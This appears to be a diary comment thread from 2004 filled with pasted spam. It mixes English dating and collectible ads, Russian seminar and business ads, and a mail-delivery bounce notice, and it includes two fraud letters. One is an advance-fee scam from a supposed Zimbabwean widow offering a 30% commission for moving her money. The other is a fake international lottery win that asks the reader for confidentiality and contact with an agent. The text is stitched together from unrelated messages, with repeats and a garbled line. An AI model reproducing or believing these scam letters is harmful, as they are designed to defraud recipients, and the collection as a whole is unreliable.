TRUE.com takes your dating life to the next level. You will be able to find out who you▓re most compatible with based on scientific research.
Take the TRUE Compatibility Test≥
LOVE confidently
Our Member Code of Ethics sets a standard of conduct of mutual respect and dignity. Plus, through our Single Verification process, every member must certify he or she is not married, and all communicating members are screened against public records to check marital status.
Learn More
LEARN safely
TRUE.com is the only online relationship service that actively
promotes the safety of its members by performing extensive
criminal screening on all of its communicating members.
Learn More
This email is a commercial advertisement sent in compliance with the CANSPAM Act of 2003. We have no desire to send you information that is not wanted, therefore, if you wish to be excluded from future mailings, please use the link at the bottom of the page. If you wish to opt out of receiving future emails from TRUE, please send an email to [email protected] with "unsubscribe" in the subject line.
Oceangreenoffers never sends unsolicited email. Oceangreenoffers has been given the right to market to youthrough our Web site partners and their privacy policies.Specifically, you are receiving thiscorrespondence because you have provided permission (via your registration and acceptance of the privacy policies for a newsletter, contest, web-based service or other activity on the web) to receive recurring promotions or offers from various third parties.
If you feel that you are receiving this email in error or would like to opt out of receiving future offers please click- here or send us a letter to
Best Leads International Limited
Rm. No 1001-2 10/F New Victory House
93-103, Wing Lok Street, Central
Hong Kong
Oceangreenoffers is not responsible for third party offers, services or products and makes no representations or warrantiesregarding them.
With 85 million singles out there, you need help finding the one. Our relationship compatibility test is the only one certified to meet American Psychological Association standards.
1. Кто контролирует организацию. Каково действующее законодательство в этой области.
2. НАЛОГОВЫЕ ОРГАНЫ
- права и обязанности налогоплательщика, плательщика сборов, налогового агента;
- права и обязанности налогового органа;
- контроль за применением ККМ;
- налоговые проверки – их виды, как и когда они могут назначаться, как должны быть оформлены, какой период могут затрагивать, возможна ли повторная проверка, на что имеют право проверяющие, как обжаловать акт налоговой проверки.
3. ТАМОЖЕННЫЕ ОРГАНЫ
- компетенция таможенных органов;
- как проходит проверка;
- права и обязанности налогоплательщика и таможенного органа.
4. ГОСУДАРСТВЕННЫЕ ВНЕБЮДЖЕТНЫЕ ФОНДЫ
- что они контролируют, какие документы могут проверить;
- права и обязанности сторон;
- можно ли изменить решение проверяющих.
5. ИНСПЕКЦИЯ ПО ТРУДУ
- к чему необходимо быть готовым;
- как и что проверяет инспекция по труду;
- если произошел несчастные случай на производстве;
- как заключить коллективный и трудовые договора так, чтобы не было претензий инспектора по труду.
6. ЗАЩИТА ПРАВ ЮРИДИЧЕСКИХ ЛИЦ И ИНДИВИДУАЛЬНЫХ ПРЕДПРИНИМАТЕЛЕЙ ПРИ ПРОВЕДЕНИИ ПРОЧИХ ВИДОВ ГОСУДАРСТВЕННОГО КОНТРОЛЯ (НАДЗОРА)
- полномочия органов власти по назначению контроля;
- полномочия органов власти по защите прав организаций (предпринимателей);
- порядок проведения и рамки контроля;
- оформление результатов проверок.
7. ВОЗМЕЩЕНИЕ УБЫТКОВ, ПОНЕСЕННЫХ ОРГАНИЗАЦИЕЙ В СВЯЗИ С НЕПРАВОМЕРНЫМИ ДЕЙСТВИЯМИ КОНТРОЛИРУЮЩИХ ОРГАНОВ
8. КАК ОТСТОЯТЬ СВОЮ ПРАВОТУ В СУДЕ
9. ОТВЕТСТВЕННОСТЬ ОРГАНИЗАЦИИ И ЕЕ ДОЛЖНОСТНЫХ ЛИЦ, ОТВЕТСТВЕННОСТЬ ИНДИВИДУАЛЬНОГО ПРЕДПРИНИМАТЕЛЯ
10. ОТВЕТСТВЕННОСТЬ КОНТРОЛИРУЮЩИХ ОРГАНОВ И ИХ ДОЛЖНОСТНЫХ ЛИЦ
Стоимость участия в семинаре - 3900 рублей, с учетом НДС.
Форма оплаты любая (наличная или безналичная).
В стоимость входит: участие в работе семинара, раздаточный материал, кофе-пауза, обед в ресторане.
Тренинг проходит в Москве (м. Академическая).
Начало - в 10 часов, окончание в 17.30-18.00.
Регистрация участников обязательна. Для регистрации необходимо сообщить следующие данные: наименование организации, ИНН,КПП, юридический адрес, телефон, факс, Ф.И.О. участников, контактное лицо.
Если необходимо бронировать гостиницу, сообщайте даты приезда-отъезда заранее.
При отсутствии возможности посетить семинар, мы предлагаем приобрести видеоверсию семинара на DVD дисках или видеокассетах (прилагается авторский раздаточный материал).
Having trouble seeing the images below? Go here to view this message in your browser, or copy/paste the link below into your browser URL address line. http://lnk.wbn1lx.com/ct?id=10790
Dear Collector,
ONE OF THE MOST ORIGINAL THOMAS KINKADE
HOLIDAY COLLECTIBLES YET!
Exciting news! Thomas Kinkade's FIRST EVER illuminated Christmas Tree is an extraordinary Collectibles Market EXCLUSIVE LIMITED EDITION — and the ultimate holiday decoration for every Kinkade collector!
This stately 15-inch, fully sculptural Christmas tree brings his beloved holiday artistry to life. Trimmed with over 40 villagers and 12 cottages and Victorian homes, each is incredibly detailed and meticulously hand-painted! Look how light glows from every window and the crystalline star topper to sparkle on the "snow" and cast golden light in your home!
As you can see, the Thomas Kinkade "Village Christmas" illuminated tree might well be the most original Kinkade collectible yet! Available on a first-come, first-served basis for a limited time only, DON'T WAIT to order yours now!
Go here for more info
SHOP WITH CONFIDENCE!
We offer a 100% money-back guarantee
for 365 days on collectibles, 60 days on jewelry.
Our e-mail recipients get the first chance to see new collectibles. If you would rather unsubscribe from collectiblestoday.com, please Go here.
It's Nice to Share!
Forward this e-mail to a friend so they can enjoy this wonderful collectible too!
I am contacting you as the need to for me to have a foreign partner in
your country has become necessary due to our plans to relocate to that
country so that I can start my life all over again as the present
political instability in Zimbabwe does not encourage financial
investment as the environment is no longer conducive for me and my
three children.Because of the political instabilities and wanton distruction of lives and properties, I was assisted by a good samaritan to safety in Johannesburg,South Africa before we eventually found ourselves in Nigeria.This was reported widely by most international media.
This problem started when the Zimbabwean government under the
leadership of President Robert Mugabe announced a decree on May 31st
2000 to seize more than 849 white and political opposition owned farms.
During these periods, as reported by international media, BBC and the
CNN, more than 6 white farmers were killed including my late husband.
The government did not stop at this, as just recently the government have
asked all white-farmers to give up their farms to black farmers and
politicians who are in alliance with the ruling party or risk going to
prison and possibly killed. So far, more than 1,400 white owned farms
have been invaded and confiscated, as well as claiming the properties
of the farmers.Also,about 133 white farmers were arrested for defying
the orders to leave their farms under the controversial land reform
programme of the government.Having married and lived with my late husband in this country Zimbabwe for more than 32 years, I have no other country to go to. Therefore, I decided to contact you, for your assistance, so that I can divert my interest in Zimbabwe to a more stablecountry as yours. Before my husband suden death,he was able
to planned well ahead of time to secure some of our properties which were meant for a new farm in Bostwana and made a reasonable money deposit to a finance company in Europe.
I will not disclose the name of the finance company and the amount that
was deposited for security reasons. The reason of the deposit was to
purchase new implements for our new farms. However, I will make
everything known to you as soon as I receive a response through my
lawyer who has been authorized to act on my behalf. The finance company is not aware of the actual contents of the consignment except the declared items (gemstones) as reflected in the deposit certificate. Also, I must re-iterate the importance of having a citizen of
your country to front for me, since I intend to invest and settle in
your country. I do not know much about your country‘s land
ownershiplaws,I thought it wise to seek the help of a citizen to act as
proxy for me and my children as their future is right now very bleak. I will upon receiving your consent make all arrangement to move
the funds to you pending my arrival to meet with you in your country.
Further arrangements would be made regarding investment thereafter.
Every modality will be worked out by my lawyer to ensure that the money
is conveniently moved to your region to enable you receive it in person
without any setbacks or inconveniencies. He will arrange a smooth
meeting between you and the finance company for the delivery.
For your assistance to me, you will be entittled to a commission of 30%
ofthe total sum for this purpose. If you are interested and willing to
assist me, you should please forward to my lawyer via his private email
Учебный центр проводит семинар с привлечением ведущих специалистов ФА по управлению Федеральным имуществом, Госкомземкадастра, Госуниверситета по землеустройству по теме:
1-й семинар
ПРАКТИКА ОПЕРАЦИЙ С ГОРОДСКИМИ ЗЕМЕЛЬНЫМИ УЧАСТКАМИ
АРЕНДА, ПОКУПКА, ПРОДАЖА, СДЕЛКИ И РЕГИСТРАЦИЯ) В 2004г.
16 – 18 сентября 2004г.
В программе семинара:
• нормативно-правовая база по осуществлению операций с земельными участками;
• формирование и межевание земельных участков как объектов недвижимости в городах в т.ч. в составе кондоминиумов;
• приватизация и оформление права собственности на землю (субъекты и объекты собственности) содержание права собственности, виды и формы собственности, способы получения и прекращения права собственности;
• учетная и регистрационная документация, процедура и оформление прав собственности на земельные участки;
• аренда как форма коммерческого использования земли: функции арендной платы, продажа права аренды, в т.ч. по конкурсу;
• операции на рынке земли: отвод, пользование, выкуп, залог, ипотека, продажа, покупка;
• оценка земельных участков для целей приватизации, оценка кадастровая и индустриальная, влияние на нее месторасположения участка и среды месторасположения, геоэкологических условий, наличия застройки, ценовое зонирование, городская земельная рента, специфика оценки не застроенных и застроенных участков;
• практические примеры оценки участков, распространенные ошибки, методы их устранения;
• земельное налогообложение, система расчета и начисления;
• Арбитражно-судебная практика разрешения споров по поводу рыночных сделок с земельно-недвижимыми объекта;
Участники семинара получают: Сертификат Госстроя РФ – 6 929 руб. НДС не обл. и раздаточный материал
2-й семинар
СОВРЕМЕННОЕ ДЕЛОПРОИЗВОДСТВО:
СЕКРЕТАРИАТА, КАНЦЕЛЯРИИ, ОТДЕЛА КАДРОВ, АРХИВА
13 – 15 сентября 2004г.
• делопроизводство в управленческом процессе: информативность и классификация документов;
• требования к оформлению документов: порядок оформления и виды бланков; реквизиты; порядок подписания, согласования и утверждения; анализ характерных ошибок при оформлении документа;
• организация документооборота: типовая инструкция по делопроизводству; порядок индексации и регистрации исходящей, входящей и внутренней корреспонденции, контроль исполнения сроков;
• составление номенклатуры дел: определение сроков хранения, внутренняя опись дел, подготовка к передаче в архив, порядок уничтожения;
• формирование и оформление дел постоянного и долговременного сроков хранения: внутренняя опись, лист-заверитель, обложка дела; подготовка дел к сдаче в архив; порядок уничтожения;
• нормативно-правовая база, регламентирующая работу кадровой службы, государственный контроль;
• документационное закрепление структуры и штата предприятия: штатное расписание;
• внутренние локальные нормативные акты: правила внутреннего трудового распорядка, положение об обработке персональных данных работника, положение о структурных подразделениях, должностныеинструкции работников;
• унифицированные формы первичной учетной документации по учету кадров: оформление приема на работу, перевода, прекращения действия трудового договора, предоставления отпуска, направления в командировку, поощрения; особенности визирования и регистрации приказов по личному составу;
• оформление и ведение личной карточки: запись об общем и непрерывном трудовом стаже;
• ведение трудовой книжки в соответствии с Трудовым кодексом; внесение изменений и исправлений; характерные ошибки, допускаемые при заполнении трудовых книжек;
• формирование личных дел: документы личного дела, составление описи;
• составление и оформление номенклатуры дел для кадровой службы предприятия: сроки хранениядокументов по личному составу, особенности участия кадровой службы в организации и работе экспертнойкомиссии предприятия;
• формирование и оформление дел по личному составу; ответственность за хранение и уничтожение документов; штрафные санкции за гибель документов, незаконное их уничтожение;
• особенности работы с документами, содержащими коммерческую и служебную тайну;
• новое в архивном делопроизводстве: перечень типовых управленческих документов Росархива: новыеформы и документы, приведенные в "Основных правилах работы архивов организаций" в 2002г.;составление и оформление описей дел;
• компьютеризация работы секретариата; канцелярии, ОК, архива, поисковые системы;
Участникам семинара выдается Удостоверение Установленного образца и раздаточный материал.
Стоимость участия в семинаре без стоимости питания:- 6 683 руб. НДС не обл.
Телефоны для заблаговременной регистрации участников: (095) 187_06_43, 152_56_23
Участники семинара должны иметь копию платежного поручения. Им выдается счет-фактура, договор акт о выполненных работах, копия лицензии бронируется гостиница (проживание оплачивается самостоятельно). Регистрация: Москва, ул.Сельскохозяйственная д.17/2, корп. 5, Гостиница «Турист» корпус «Учебно- тренинговой гостиницы», ауд. 209, (м. Ботанический сад)
Консультации по вопросам прав акционеров и участников;
Разработка учредительных документов на заказ;
Проведение общих собраний акционеров или участников;
Корпоративные споры;
Сопровождение крупных сделок и сделок с заинтересованностью.
Ликвидация юридических лиц;
Бухгалтерское сопровождение;
Составление и экспертиза любых видов гражданско-правовых договоров;
Юридическое сопровождение сделок с недвижимостью;
"Сложные" случаи регистрации недвижимости в МКРП.
На комплексный заказ - СКИДКИ!
Контактная информация:
(095) 518~1543, 506~2968, 250~6342
Если вы открыли это письмо, то Вам, наверно нужны юридические услуги. Если Вы открыли это письмо случайно, и Вам не нужны юридические услуги, то срочно удалите его и извините за беспокойство. Отписаться от рассылки можно позвонив по тел. 250 63 42 и сообщив свой e-mail.
Если Вы записываете на CD, DVD или видеокассеты презентации, учебные курсы, портфолио, а также юбилеи и другие события - подумайте о том, чтобы красиво оформить их: закажите качественную полиграфию. Благодаря новым цифровым технологиям это можно сделать недорого даже при очень маленьких тиражах.
Телефоны: (095) , 3.6.1-5.7-9.6, 3.6.2-0.2-3.3.
ПОЛИГРАФИЯ ДЛЯ CD
Под стандартный футляр (Jewel Box)
Лицевая обложка 4+0 120х120 мм и оборот 4+0 150х120 мм
ОБЯЗАТЕЛЬНЫЙ КУРС ПРОФЕССИОНАЛА ПО КАДРОВОЙ РАБОТЕ
Автор семинара - КОЖЕМЯКИНА ЕЛЕНА АЛЕКСАНДРОВНА, ведущий консультант компании БИЗНЕСЛЭНД, практикующий консультант по трудовому праву крупнейших компаний Москвы и России, руководитель проектов абонементного обслуживания иностранных и российских компаний
Цели:
Представить принципы и правила работы кадровых служб по кадровому делопроизводству с целью создания защищенности компании и работодателя от санкций, налагаемых проверяющими органами
Сократить трудовые и материальные затраты на постановку и ведение кадрового делопроизводства
Придать юридическую силу кадровым документам
Подтвердить и сохранить трудовой стаж сотрудников
Программа:
Постановка системы кадрового делопроизводства с целью оптимизации и сокращения издержек на кадровый документооборот
Рассмотрение правил оформления приказов по личному составу. Придание приказам юридической силы
Принципы работы с трудовыми книжками. Правила внесения записей в трудовую книжку. Правила подсчета трудового стажа. Правила хранения и выдачи трудовых книжек
Особенности оформления документов при увольнении работника по инициативе администрации за прогул, неоднократное неисполнение трудовых обязанностей согласно трудовому договору или правилам внутреннего трудового распорядка без уважительных причин, появление на работе в нетрезвом состоянии
Правила оформления кадровых документов по процедуре сокращения численности или штата работников
Процедура изменения существенных условий трудового договора
Прилагается комплект методических разработок (на электромагнитных и бумажных носителях) с образцами необходимых документов: образцы документов по кадровому делопроизводству в текстовой форме согласно новому ГОСТу 6.30-2003 и унифицированные формы Т1, Т5, Т6, Т8, Т9, Т11 (приказы по приему, переводу, отпуску, увольнению, командированию, премированию), штатное расписание, график отпусков, личные карточки работников формы Т2, уведомление о предстоящем высвобождении работника и изменении существенных условий трудового договора, объяснительные записки, докладные записки, акты. Образцы локальных нормативных актов: типовые правила внутреннего трудового распорядка. Образцы трудовых договоров: срочных, на неопределенный срок. Образец договора возмездного оказания услуг. Новая инструкция по ведению трудовых книжек, введенная в действие 16 апреля 2003 года. Нормативно-методическая база, регламентирующая работу с кадровой документацией
В стоимость семинара входит:
Обед в Ресторане, Две кофе-паузы,
Комплект методических материалов,
Свидетельство установленного образца
Для слушателей из регионов бронируются гостиничные номера.
ЗАО «ПромподшипникИмпорт» приглашает Вас посетить свой стенд Е 5/5 на выставке ИНТЕРДРАЙВ-2004,
которая будет проводится в выставочном комплексе
«КРОКУС ЭКСПО» с 07 по 10 сентября 2004 г.
На нашем стенде будет представлен широкий спектр поставляемой нами продукции:
• Подшипники качения и скольжения, системы линейного перемещения, шариковинтовые передачи (ШВП) производства SKF (Швеция), Timken (США), INA, GMN, STAR (Германия), Nadella (Франция);
• Смазки для подшипников и подшипниковых узлов (в т.ч. совместимые с пищевыми продуктами);
• Уплотнения производства CR (Chicago Rawhide) (США);
• Инструмент для монтажа и демонтажа подшипников, индукционные нагреватели;
• Диагностическое оборудование для проведения мониторинга состояния подшипников и машин;
• Приводные ремни любых типов производства Goodyear (США), Optibelt (Германия), Bando (Япония);
• Транспортерные ленты различного исполнения производства Ammeraal (Нидерланды), Esbelt (Испания);
• Втулочно-роликовые цепи производства Arnold and Stolzenberg, Flexon (Германия);
• Модульные пластиковые ленты производства Intralox (Нидерланды);
• Другие комплектующие для ремонта оборудования.
Вы также сможете получить технические консультации по выбору, установке и правильной эксплуатации подшипников и приводных ремней.
Будем рады приветствовать Вас на нашем стенде.
По вопросам посещения выставки, получения пригласительных билетов и поставки указанной продукции просим обращаться по тел.: (095) 782-4900; 310-7771; 119-9888; 775-2052
P.S. Данная рассылка является разовой. Просим прощения если данное письмо Вас не заинтересовало.
Самое прогрессивное агентство недвижимости Москвы. Приглашаем опытных агентов (до 50%), брокеров (до 85%) и сложившиеся коллективы (50%) в отделы вторичного жилья и коммерческой недвижимости.
Приглашаем руководителей отделов (оклад от 1000$). Особые условия для менеджера с группой сотрудников. Всесторонняя рекламная поддержка-печать, телевидение, радио, расклейка. Формирование рекламной стратегии под конкретную группу. Инвестируем средства в выкуп квартир, офисов, земельных участков. Расселяем на свои деньги.
Большой объем работ. Высокий процент оплаты (30-70%). Честные комиссионные. Бригадный метод работы. Гарантированный заработок. Высокоскоростной интернет, цифровая телефония, оборудованные рабочие места, самая большая база данных в Москве по вторичной и коммерческой недвижимости (130 000 объектов и клиентов).
To stop receiving offers from the advertiser please visit the site using the link above and enter your email address in the opt out box at the bottom of the page.
Or write to the address below.
iCashBiz
1648 Taylor Road, #312
Port Orange, Florida 32128
To unsubscribe from this email list please follow the unsubscribe instructions below.
Your privacy is extremely important to us. As a leader in permission-based email promotions, we are committed to delivering a highly rewarding experience with great opportunities. This message may be a recurring mailing. To clear your name from our database, click below.
29.08.2004 в 07:56
(компаний производителей и дистрибьюторов)
15 - 19 сентября 2004 г.
Именно для решения конкретных задач, стоящих перед каждым супервайзером, старшим
менеджером и другими менеджерами среднего звена, которые занимаются организацией
работы полевой команды мерчендайзеров, мы собрали прикладные технологии и
инструменты, объединив их в программу специализированного семинара-практикума.
Цель курса дать участникам знания и практические навыки по разработке концепции
мерчендайзинга и внедрению ее силами команды полевых сотрудников. Участники
курса также получат информацию о том, какие мерчендайзинговые инструменты
наиболее результативны, и как эффективно управлять полевым персоналом
/ Москва / 981...1Ч...59, 98О...65...49
В ПРОГРАММЕ КУРСА:
- Концепция мерчендайзинга
- Организация мерчендайзинга в компании
- Управление и подбор персонала отдела мерчендайзинга
- Планирование и контроль работы мерчензайзеров
- Полевой аудит
- Обучение персонала на местах продаж
Семинар проходит в интенсивной интерактивной форме с разбором большого количества
примеров из практики российских компаний. В ходе семинара участники выполнят множество
практических заданий, поучаствуют в дискуссиях и поделятся опытом не только на предложенных
авторами кейсах, но и на примере своей компании.
/ Москва / 981...1Ч...59, 98О...65...49
29.08.2004 в 07:58
Приглашаем руководителей и специалистов принять
участие в новом актуальном семинаре:
ИНФОРМАЦИЯ ПРАВИТ МИРОМ.
ЧТО НУЖНО ЗНАТЬ ПЕРЕД ТЕМ КАК ВНЕДРЯТЬ СИСТЕМУ АВТОМАТИЗАЦИИ
20-21 сентября 2004 года
Цель семинара: дать несколько практических инструментов для контроля специалиста-
компьютерщика, оценки ИТ-стратегии предприятия. Рассказать на доступном языке и
языке бизнеса то, что пытаются Вам объяснить компьютерщики, когда сроки проекта
сорваны, а его бюджет превышен. Но гораздо лучше не допустить этих проблем, и как
их избежать, Вы также узнаете на семинаре.
Семинар адресован руководителям и владельцам предприятий, которые смогут
получить массу полезной информации о стратегии и стратегических инструментах управления.
Также он будет интересен финансовым директорам и специалистам по контроллингу, поскольку
значительная часть информационной системы - это управленческая отчетность и инструменты
ее построения. И, наконец, менеджерам по персоналу, так как под их управлением находится
значительная часть Информационной системы предприятия - коммуникации между сотрудниками,
их компетенция, внутренние СМИ и обратная связь в компании.
Позвоните по телефону:
(О95) 98О.....62...82, 98О.....65...З6,
чтобы оставить заявку или получить подробную информацию.
Содержание семинара:
1. Место ИТ в структуре организации
- Кто и что делает в ИТ, где без них можно обойтись и как их контролировать.
- Стратегия ИТ, связь с другими стратегиями предприятия.
- Карта знаний ИТ, как ориентироваться на неизвестной местности.
- Сколько стоит и когда платить, чтобы все работали.
2. Состав и функции ИТ и способы автоматизации деловых процедур
3. Система отчетности предприятия.
4. Система стратегического управления.
5. Система оперативно-тактического управления.
6. Управление ИТ-процессами и их контроль.
7. Инструменты управления ИТ-черным ящиком, рычаги и кнопки
- Техническое задание - ловушка для непосвященного.
- Манипуляции специалистов, как их разрушать.
- Способы мотивации ИТ-специалистов.
- Оценка работы ИТ, внутренний и внешний аудит, обучение.
- Функции ИТ-специалистов, должностные инструкции.
8. Проект автоматизации
- Определение потребности, кто "за", кто "против".
- Анализ "Общей стоимости владения".
- Вопросы, на которые Вам должны ответить специалисты.
- Оперативный контроль исполнения проекта.
- Методики разработки и внедрения - для того, чтобы понимать, чем занимаются подрядчики.
- Почему трудно покупать "ИТ-продукт" и легко "ИТ-услугу". Распределение рисков проекта.
9. Теория информации и другие интересные вопросы
- Обзор последних и лучших источников по данной теме.
- Терминология: ИТ, система, стратегия, контроллинг и др.
- Управление знаниями и бизнес-процессами: обзор подходов.
- Обзор некоторых популярных инструментов управления с точки зрения информационной системы.
Автор семинара - консультант, создатель учебных курсов по IT-стратегиям, внедрению IT-систем и Сhange management.
Имеет опыт автоматизации коммерческого банка в качестве исполнителя, а затем топ-менеджера. Осуществлял внедрение
более 150 систем электронного документооборота, а также организацию сервисного обслуживания в области IT более
70 предприятий. Занимается анализом тенденций в области IT, маркетинга, коммуникций.
Позвоните по телефону:
(О95) 98О.....62...82, 98О.....65...З6,
чтобы оставить заявку или получить подробную информацию.
ыьюяь ча опцаукее юе мхпгщ
29.08.2004 в 08:00
TRUE.com takes your dating life to the next level. You will be able to find out who you▓re most compatible with based on scientific research.
Take the TRUE Compatibility Test≥
LOVE confidently
Our Member Code of Ethics sets a standard of conduct of mutual respect and dignity. Plus, through our Single Verification process, every member must certify he or she is not married, and all communicating members are screened against public records to check marital status.
Learn More
LEARN safely
TRUE.com is the only online relationship service that actively
promotes the safety of its members by performing extensive
criminal screening on all of its communicating members.
Learn More
This email is a commercial advertisement sent in compliance with the CANSPAM Act of 2003. We have no desire to send you information that is not wanted, therefore, if you wish to be excluded from future mailings, please use the link at the bottom of the page. If you wish to opt out of receiving future emails from TRUE, please send an email to [email protected] with "unsubscribe" in the subject line.
--------------------------------------------------------------------------------
Oceangreenoffers never sends unsolicited email. Oceangreenoffers has been given the right to market to youthrough our Web site partners and their privacy policies.Specifically, you are receiving thiscorrespondence because you have provided permission (via your registration and acceptance of the privacy policies for a newsletter, contest, web-based service or other activity on the web) to receive recurring promotions or offers from various third parties.
If you feel that you are receiving this email in error or would like to opt out of receiving future offers please click- here or send us a letter to
Best Leads International Limited
Rm. No 1001-2 10/F New Victory House
93-103, Wing Lok Street, Central
Hong Kong
Oceangreenoffers is not responsible for third party offers, services or products and makes no representations or warrantiesregarding them.
29.08.2004 в 09:06
It always a pleasure to visit your lovely diary .
Visit http://forum.ivo.ru and enjoy it!
Join us and you will find many new friends.
Best regards!
30.08.2004 в 07:31
SMTP module(domain old.swip.net) reports:
host old.swip.net says:
550 Invalid recipient: <[email protected]>
--------------------------------------------------------------------------------
Received: from [195.128.81.203] (HELO tele2.fr)
by mailfe04.swip.net (CommuniGate Pro SMTP 4.2b8)
with ESMTP id 147038976 for [email protected]; Sun, 29 Aug 2004 11:04:41 +0200
From: [email protected]
To: [email protected]
Subject: You cannot do that!
Date: Sun, 29 Aug 2004 13:04:42 +0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0016----=_NextPart_000_0016"
X-Priority: 3
X-MSMail-Priority: Normal
Message-ID: <[email protected]>
30.08.2004 в 07:32
TRUEBeginnings
With 85 million singles out there, you need help finding the one. Our relationship compatibility test is the only one certified to meet American Psychological Association standards.
http://st1.click-offers.com/czs.asp...VRVLU5FVC5SVQ==
TRUE(TM)
5215 North O'Connor, Suite 1600
Irving, TX 75039
866-583-8783
www.True.com
Unsub: [email protected]
---------------------------------------------------------------------------
To no longer receive these messages from CityBend
FOLLOW THE LINK BELOW
http://click.CityBend.com/MyPrivacy...p;uid=145047358
OR
Write or fax to:
370 W. Pleasantview Ave. #310
Hackensack, NJ 07601
201-227-9700 (Fax)
---------------------------------------------------------------------------
30.08.2004 в 07:34
21 WEESPERPLEIN
1067ZL AMSTERDAM,
THE NETHERLANDS.
FROM:THE DESK OF THE MANAGING DIRECTOR
EUROPA INTERNATIONAL LOTTERY/PRIZE AWARD DEPT
REF:OYL/36510460037/01.
BATCH:22/00218/108.
ATTN:CEO,
Dear Winner,
We are pleased to inform you of the result of the Lottery Winners
International programs held on the 27/08/2004. Your e-mail address
attached to ticket number 753164251591-6000 with serial number 7722
413,batch number 22/00218/108,lottery ref number OYL/36510460037/01 and
drew lucky number 8-17-40-44-49 which consequently won in the 1st
category, you have therefore been approved for a lump sum pay out of US$1,000,000.00
(One Million United States Dollars)
CONGRATULATIONS!!!
Due to mix up of some numbers and names, we ask that you keep your
winning information confidential until your claims has been processed
and your money remitted to you. This is part of our security protocol to
avoid double claiming and unwarranted abuse of this program by some
participants. All participants were selected through a computer ballot
system drawn from over 40,000 companies and 2,000,000 individual email addresses
and names from all over the world. This promotional program takes place
every year. This lottery was promoted and sponsored by Association of software
producers.
To file for your claim, please contact our fiducial agent,
MR.WILLIAM VAN DIJK of Premium Trust Agency.
Tel: 0031 638 040 923
Email:[email protected]
Remember, all winning must be claimed not later than 31th october of 2004.After
this date all unclaimed funds will be included in the next stake.
Please note in order to avoid unnecessary delays and complications
please remember to quote your reference number and batchnumbers in all
correspondence. Furthermore, should there be any change of address do
inform our agent as soon as possible. Congratulations once more from our
members of staff and thank you for being part of our promotional program.
Note: Anybody under the age of 18 is automatically disqualified.
Yours Sincerely,
Mrs. Simone Timmer
Lottery Co-Ordinator.
Europa International Lottery.
__________________________________________________________________
Get Tiscali Broadband From Ј15:99
http://www.tiscali.co.uk/products/broadbandhome/
30.08.2004 в 07:35
предлагает вниманию главных бухгалтеров и налоговых консультантов,
финансовых директоров и руководителей предприятий
--------------------------------------------------------------------------------
9 сентября
однодневный открытый семинар по теме
"Особенности взаимоотношений с контролирующими органами"
--------------------------------------------------------------------------------
В программе семинара:
1. Кто контролирует организацию. Каково действующее законодательство в этой области.
2. НАЛОГОВЫЕ ОРГАНЫ
- права и обязанности налогоплательщика, плательщика сборов, налогового агента;
- права и обязанности налогового органа;
- контроль за применением ККМ;
- налоговые проверки – их виды, как и когда они могут назначаться, как должны быть оформлены, какой период могут затрагивать, возможна ли повторная проверка, на что имеют право проверяющие, как обжаловать акт налоговой проверки.
3. ТАМОЖЕННЫЕ ОРГАНЫ
- компетенция таможенных органов;
- как проходит проверка;
- права и обязанности налогоплательщика и таможенного органа.
4. ГОСУДАРСТВЕННЫЕ ВНЕБЮДЖЕТНЫЕ ФОНДЫ
- что они контролируют, какие документы могут проверить;
- права и обязанности сторон;
- можно ли изменить решение проверяющих.
5. ИНСПЕКЦИЯ ПО ТРУДУ
- к чему необходимо быть готовым;
- как и что проверяет инспекция по труду;
- если произошел несчастные случай на производстве;
- как заключить коллективный и трудовые договора так, чтобы не было претензий инспектора по труду.
6. ЗАЩИТА ПРАВ ЮРИДИЧЕСКИХ ЛИЦ И ИНДИВИДУАЛЬНЫХ ПРЕДПРИНИМАТЕЛЕЙ ПРИ ПРОВЕДЕНИИ ПРОЧИХ ВИДОВ ГОСУДАРСТВЕННОГО КОНТРОЛЯ (НАДЗОРА)
- полномочия органов власти по назначению контроля;
- полномочия органов власти по защите прав организаций (предпринимателей);
- порядок проведения и рамки контроля;
- оформление результатов проверок.
7. ВОЗМЕЩЕНИЕ УБЫТКОВ, ПОНЕСЕННЫХ ОРГАНИЗАЦИЕЙ В СВЯЗИ С НЕПРАВОМЕРНЫМИ ДЕЙСТВИЯМИ КОНТРОЛИРУЮЩИХ ОРГАНОВ
8. КАК ОТСТОЯТЬ СВОЮ ПРАВОТУ В СУДЕ
9. ОТВЕТСТВЕННОСТЬ ОРГАНИЗАЦИИ И ЕЕ ДОЛЖНОСТНЫХ ЛИЦ, ОТВЕТСТВЕННОСТЬ ИНДИВИДУАЛЬНОГО ПРЕДПРИНИМАТЕЛЯ
10. ОТВЕТСТВЕННОСТЬ КОНТРОЛИРУЮЩИХ ОРГАНОВ И ИХ ДОЛЖНОСТНЫХ ЛИЦ
--------------------------------------------------------------------------------
Стоимость участия в семинаре - 3900 рублей, с учетом НДС.
Форма оплаты любая (наличная или безналичная).
В стоимость входит: участие в работе семинара, раздаточный материал, кофе-пауза, обед в ресторане.
Тренинг проходит в Москве (м. Академическая).
Начало - в 10 часов, окончание в 17.30-18.00.
Регистрация участников обязательна. Для регистрации необходимо сообщить следующие данные: наименование организации, ИНН,КПП, юридический адрес, телефон, факс, Ф.И.О. участников, контактное лицо.
Если необходимо бронировать гостиницу, сообщайте даты приезда-отъезда заранее.
--------------------------------------------------------------------------------
При отсутствии возможности посетить семинар, мы предлагаем приобрести видеоверсию семинара на DVD дисках или видеокассетах (прилагается авторский раздаточный материал).
Стоимость видеокурса - 2600 рублей, с учетом НДС.
--------------------------------------------------------------------------------
Также в нашем Центре состоятся семинары по темам:
16 сентября 2004 года
«Бухгалтерский и налоговый учет использования автомобиля в организации»
17 сентября 2004 года
«Хозяйственные договоры и сделки: бухгалтерский и налоговый аспекты»
При регистрации на 2 семинара – скидка 10%,
при регистрации на 3 семинара – четвертый Вы посещаете бесплатно.
На участие в семинарах и приобретение видеозаписей оформляется полный пакет бухгалтерских документов.
--------------------------------------------------------------------------------
КОНТАКТНЫЕ ТЕЛЕФОНЫ: (095) 788-73-28.
30.08.2004 в 07:38
Dear Collector,
ONE OF THE MOST ORIGINAL THOMAS KINKADE
HOLIDAY COLLECTIBLES YET!
Exciting news! Thomas Kinkade's FIRST EVER illuminated Christmas Tree is an extraordinary Collectibles Market EXCLUSIVE LIMITED EDITION — and the ultimate holiday decoration for every Kinkade collector!
This stately 15-inch, fully sculptural Christmas tree brings his beloved holiday artistry to life. Trimmed with over 40 villagers and 12 cottages and Victorian homes, each is incredibly detailed and meticulously hand-painted! Look how light glows from every window and the crystalline star topper to sparkle on the "snow" and cast golden light in your home!
